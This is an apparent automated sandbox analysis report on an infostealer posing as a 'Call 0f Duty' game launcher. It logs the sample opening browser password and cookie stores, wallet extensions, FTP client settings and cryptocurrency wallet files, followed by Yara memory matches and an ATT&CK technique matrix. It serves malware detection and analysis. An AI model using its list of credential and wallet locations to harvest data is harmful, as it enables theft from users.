              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exeDirectory queried: number of queries: 1001
              Source: Yara matchFile source: 00000003.00000003.2112166479.0000000003572000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2133799366.0000000003572000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2156727898.0000000003573000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2089652859.0000000003573000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2133185254.0000000003572000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2159389391.000000000357F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2089726082.0000000003577000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Call 0f Duty A1 Launcher.exe PID: 4832, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: Call 0f Duty A1 Launcher.exe PID: 4832, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              211
              Process Injection
              11
              Virtualization/Sandbox Evasion
              2
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              DLL Side-Loading
              211
              Process Injection
              LSASS Memory1
              Query Registry
              Remote Desktop Protocol41
              Data from Local System
              1
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information
              Security Account Manager141
              Security Software Discovery
              SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Obfuscated Files or Information
              NTDS11
              Virtualization/Sandbox Evasion
              Distributed Component Object ModelInput Capture14
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing
              LSA Secrets1
              Process Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials21
              File and Directory Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync33
              System Information Discovery
